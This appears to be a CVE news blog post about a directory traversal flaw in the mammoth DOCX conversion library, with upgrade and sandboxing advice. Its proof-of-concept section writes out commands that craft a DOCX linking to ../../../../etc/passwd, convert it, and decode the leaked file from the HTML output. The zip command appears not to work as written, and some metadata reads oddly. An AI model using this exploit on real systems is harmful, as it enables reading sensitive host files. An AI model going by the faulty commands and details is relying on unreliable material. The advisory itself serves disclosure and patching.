Mammoth Directory Traversal CVE-2023-3032 (Critical)

By /

Listen to this Post

The vulnerability exists in the mammoth document conversion library. When processing a DOCX file containing an image with an external link (using the `r:link` attribute), the library does not validate the resolved file path. It directly resolves the URI from the document to a local file system path. This path is then read, and its content is base64 encoded into the final HTML output as a data URI. An attacker can exploit this by crafting a malicious DOCX file with an image link pointing to a sensitive system file using directory traversal sequences (e.g., ../../etc/passwd). The library will resolve this path, read the specified file, and include its contents in the output, leading to arbitrary file disclosure. Additionally, linking to device files like `/dev/random` can cause Denial of Service through resource exhaustion.
Platform: Node.js, Java
Version: <1.11.0

Vulnerability : Directory Traversal

Severity: Critical

date: 2023-07-27

Prediction: 2023-08-10

What Undercode Say:

Crafting a malicious DOCX with a traversal link
zip -u malicious.docx "word/_rels/document.xml.rels" <<< ' <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../../../../etc/passwd" TargetMode="External"/> '
Simulating the vulnerable conversion command
npx mammoth malicious.docx output.html
Checking for file disclosure in output
grep -oP 'base64,[^"]+' output.html | base64 -d

How Exploit:

Craft DOCX with external image link using `Target=”../../etc/passwd”` and TargetMode="External". Run mammoth to convert, sensitive file content appears in HTML as base64 data URI.

Protection from this CVE

Upgrade to mammoth version 1.11.0 or later. Sanitize user-supplied DOCX files before processing. Implement file path validation and restrict file access to a sandboxed environment.

Impact:

Arbitrary file read on host system, potential Denial of Service via resource exhaustion by reading device files like /dev/zero.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top